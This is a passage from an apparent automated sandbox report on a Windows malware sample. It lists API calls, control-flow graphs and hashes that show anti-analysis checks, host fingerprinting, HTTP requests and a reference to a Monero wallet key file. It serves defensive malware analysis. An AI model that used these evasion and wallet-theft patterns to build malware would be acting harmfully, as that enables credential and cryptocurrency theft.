                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 5110ebf554a74a3a3cd053ab5a565c630bafe6ee1744fb110894a4d4c40d11d1
                        • Instruction ID: c0f994f2d4ad611a9a9cb6b2bda1f5b5e97b2f8f4742023d8414652d392006b0
                        • Opcode Fuzzy Hash: 5110ebf554a74a3a3cd053ab5a565c630bafe6ee1744fb110894a4d4c40d11d1
                        • Instruction Fuzzy Hash: 4DE11E72A101049BCB54FBA4DDA6BFE737CABD5300F508529B41767191EF386A09CBD2
                        Function 009A17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 9a17a0-9a17cd call 9aaad0 StrCmpCA 1304 9a17cf-9a17d1 ExitProcess 1301->1304 1305 9a17d7-9a17f1 call 9aaad0 1301->1305 1309 9a17f4-9a17f8 1305->1309 1310 9a17fe-9a1811 1309->1310 1311 9a19c2-9a19cd call 9aa800 1309->1311 1313 9a199e-9a19bd 1310->1313 1314 9a1817-9a181a 1310->1314 1313->1309 1316 9a187f-9a1890 StrCmpCA 1314->1316 1317 9a185d-9a186e StrCmpCA 1314->1317 1318 9a1932-9a1943 StrCmpCA 1314->1318 1319 9a1913-9a1924 StrCmpCA 1314->1319 1320 9a1970-9a1981 StrCmpCA 1314->1320 1321 9a18f1-9a1902 StrCmpCA 1314->1321 1322 9a1951-9a1962 StrCmpCA 1314->1322 1323 9a1835-9a1844 call 9aa820 1314->1323 1324 9a1849-9a1858 call 9aa820 1314->1324 1325 9a18cf-9a18e0 StrCmpCA 1314->1325 1326 9a198f-9a1999 call 9aa820 1314->1326 1327 9a18ad-9a18be StrCmpCA 1314->1327 1328 9a1821-9a1830 call 9aa820 1314->1328 1346 9a189e-9a18a1 1316->1346 1347 9a1892-9a189c 1316->1347 1344 9a187a 1317->1344 1345 9a1870-9a1873 1317->1345 1333 9a194f 1318->1333 1334 9a1945-9a1948 1318->1334 1331 9a1930 1319->1331 1332 9a1926-9a1929 1319->1332 1338 9a198d 1320->1338 1339 9a1983-9a1986 1320->1339 1329 9a190e 1321->1329 1330 9a1904-9a1907 1321->1330 1335 9a196e 1322->1335 1336 9a1964-9a1967 1322->1336 1323->1313 1324->1313 1350 9a18ec 1325->1350 1351 9a18e2-9a18e5 1325->1351 1326->1313 1348 9a18ca 1327->1348 1349 9a18c0-9a18c3 1327->1349 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 9a18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 009A17C5
                        • ExitProcess.KERNEL32 ref: 009A17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: deca31ed00e20fb4dedfd95ba346bfa0db33b0787a1a31aa0ece18af81846ef6
                        • Instruction ID: 45de8c053fa0eb71935f1ef60c1d07ad75cae211d1aa1246804d254ef9d8f720
                        • Opcode Fuzzy Hash: deca31ed00e20fb4dedfd95ba346bfa0db33b0787a1a31aa0ece18af81846ef6
                        • Instruction Fuzzy Hash: AB515CB4A04209EBCB14DFA4E9A4BBF77B5AFC5304F104449E80667390D775E941DBA2
                        Function 009A7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 9a7500-9a754a GetWindowsDirectoryA 1357 9a754c 1356->1357 1358 9a7553-9a75c7 GetVolumeInformationA call 9a8d00 * 3 1356->1358 1357->1358 1365 9a75d8-9a75df 1358->1365 1366 9a75fc-9a7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 9a75e1-9a75fa call 9a8d00 1365->1367 1369 9a7628-9a7658 wsprintfA call 9aa740 1366->1369 1370 9a7619-9a7626 call 9aa740 1366->1370 1367->1365 1377 9a767e-9a768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009A7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A760A
                        • wsprintfA.USER32 ref: 009A7640
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 72776099c6d47c52a4f9737c3a83170e2863724ff2ff5d67988be8b0f238c175
                        • Instruction ID: 695ae3ab2562f6cec5abe8317781562c0fd50ac105435f798400db4e7d4313a6
                        • Opcode Fuzzy Hash: 72776099c6d47c52a4f9737c3a83170e2863724ff2ff5d67988be8b0f238c175
                        • Instruction Fuzzy Hash: 6641B1B1D05248ABDF10DF94DC55BEEBBB8EF49704F100099F50A67280EB78AA44CBE5
                        Function 009A69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B07C8), ref: 009A98A1
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0810), ref: 009A98BA
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0738), ref: 009A98D2
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0828), ref: 009A98EA
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B06D8), ref: 009A9903
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B8A70), ref: 009A991B
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015A64C0), ref: 009A9933
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015A6440), ref: 009A994C
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0630), ref: 009A9964
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B06F0), ref: 009A997C
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0648), ref: 009A9995
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0708), ref: 009A99AD
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015A63C0), ref: 009A99C5
                          • Part of subcall function 009A9860: GetProcAddress.KERNEL32(75900000,015B0768), ref: 009A99DE
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009911D0: ExitProcess.KERNEL32 ref: 00991211
                          • Part of subcall function 00991160: GetSystemInfo.KERNEL32(?), ref: 0099116A
                          • Part of subcall function 00991160: ExitProcess.KERNEL32 ref: 0099117E
                          • Part of subcall function 00991110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0099112B
                          • Part of subcall function 00991110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00991132
                          • Part of subcall function 00991110: ExitProcess.KERNEL32 ref: 00991143
                          • Part of subcall function 00991220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0099123E
                          • Part of subcall function 00991220: __aulldiv.LIBCMT ref: 00991258
                          • Part of subcall function 00991220: __aulldiv.LIBCMT ref: 00991266
                          • Part of subcall function 00991220: ExitProcess.KERNEL32 ref: 00991294
                          • Part of subcall function 009A6770: GetUserDefaultLangID.KERNEL32 ref: 009A6774
                          • Part of subcall function 00991190: ExitProcess.KERNEL32 ref: 009911C6
                          • Part of subcall function 009A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009911B7), ref: 009A7880
                          • Part of subcall function 009A7850: RtlAllocateHeap.NTDLL(00000000), ref: 009A7887
                          • Part of subcall function 009A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009A789F
                          • Part of subcall function 009A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7910
                          • Part of subcall function 009A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009A7917
                          • Part of subcall function 009A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009A792F
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 009A6AF9
                        • Sleep.KERNEL32(00001770), ref: 009A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6B1A
                        • ExitProcess.KERNEL32 ref: 009A6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 3307ce1b541b4bb0d8e47a62738c280d7949dd1bd453f0eb11590e749dd632b1
                        • Instruction ID: f69c1d1b935debae43ef665d53f63aab636cb182969d396738813bca4d41ab70
                        • Opcode Fuzzy Hash: 3307ce1b541b4bb0d8e47a62738c280d7949dd1bd453f0eb11590e749dd632b1
                        • Instruction Fuzzy Hash: 12314D70904209ABDB44FBF4DC6BBEEB778AFC6300F104519F212A2191EF746905C6E6
                        Function 00991220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 991220-991247 call 9a89b0 GlobalMemoryStatusEx 1439 991249-991271 call 9ada00 * 2 1436->1439 1440 991273-99127a 1436->1440 1442 991281-991285 1439->1442 1440->1442 1444 99129a-99129d 1442->1444 1445 991287 1442->1445 1447 991289-991290 1445->1447 1448 991292-991294 ExitProcess 1445->1448 1447->1444 1447->1448
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0099123E
                        • __aulldiv.LIBCMT ref: 00991258
                        • __aulldiv.LIBCMT ref: 00991266
                        • ExitProcess.KERNEL32 ref: 00991294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 987b6a4a8bf12b36a92d5cccd131b09e5bc542b7e5966f751ebeeef6dcc64ca1
                        • Instruction ID: 816874d9eb0bd8df69d3ac84d03134fba764b83a4e9662d2933cebd6eaba0878
                        • Opcode Fuzzy Hash: 987b6a4a8bf12b36a92d5cccd131b09e5bc542b7e5966f751ebeeef6dcc64ca1
                        • Instruction Fuzzy Hash: 3F016DB0E41309BBEF10EBE4CC49B9EBB78BB44701F208049E706B62C0DB7456418B99
                        Function 009A6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 9a6af3 1451 9a6b0a 1450->1451 1453 9a6aba-9a6ad7 call 9aaad0 OpenEventA 1451->1453 1454 9a6b0c-9a6b22 call 9a6920 call 9a5b10 CloseHandle ExitProcess 1451->1454 1460 9a6ad9-9a6af1 call 9aaad0 CreateEventA 1453->1460 1461 9a6af5-9a6b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009A6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 009A6AF9
                        • Sleep.KERNEL32(00001770), ref: 009A6B04
                        • CloseHandle.KERNEL32(?,00000000,?,015B8A40,?,009B110C,?,00000000,?,009B1110,?,00000000,009B0AEF), ref: 009A6B1A
                        • ExitProcess.KERNEL32 ref: 009A6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: d73213309a9fd89b11493f13d51f9e9ac432623988cce80b8f91467d797fddd9
                        • Instruction ID: 40cdec42c73069b39e58004702cd5d28f1e71bde0ea8b52753cbf4fb7f4a6c89
                        • Opcode Fuzzy Hash: d73213309a9fd89b11493f13d51f9e9ac432623988cce80b8f91467d797fddd9
                        • Instruction Fuzzy Hash: E4F08230A44209EFE700ABA0DC1ABBEBB74FB46701F144915F513E21C1EFB05940D6E6
                        Function 009947B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 07b7ec57818962af659bac89d9135a3af55d9c801f272b9fc8076999b4f476e1
                        • Instruction ID: 82f876f513a0b63232672ca6dcacb4886532962c572f799a854978ac0d076bcb
                        • Opcode Fuzzy Hash: 07b7ec57818962af659bac89d9135a3af55d9c801f272b9fc8076999b4f476e1
                        • Instruction Fuzzy Hash: E6213EB1D00209ABDF14DFA5EC45BDDBB75FB45320F108225F915A7290EB706A0ACB91
                        Function 009A51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 00996280: InternetOpenA.WININET(009B0DFE,00000001,00000000,00000000,00000000), ref: 009962E1
                          • Part of subcall function 00996280: StrCmpCA.SHLWAPI(?,015BE270), ref: 00996303
                          • Part of subcall function 00996280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00996335
                          • Part of subcall function 00996280: HttpOpenRequestA.WININET(00000000,GET,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00996385
                          • Part of subcall function 00996280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009963BF
                          • Part of subcall function 00996280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009963D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009A5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 02aec151727f0717b79ff18b72d1df55b30a5aac269b64e7f2d07252383d3a01
                        • Instruction ID: 16f0f70ba864c95e4072a643338fdaf8ad6bea0e7d6dfa16e0e278dcfd05560e
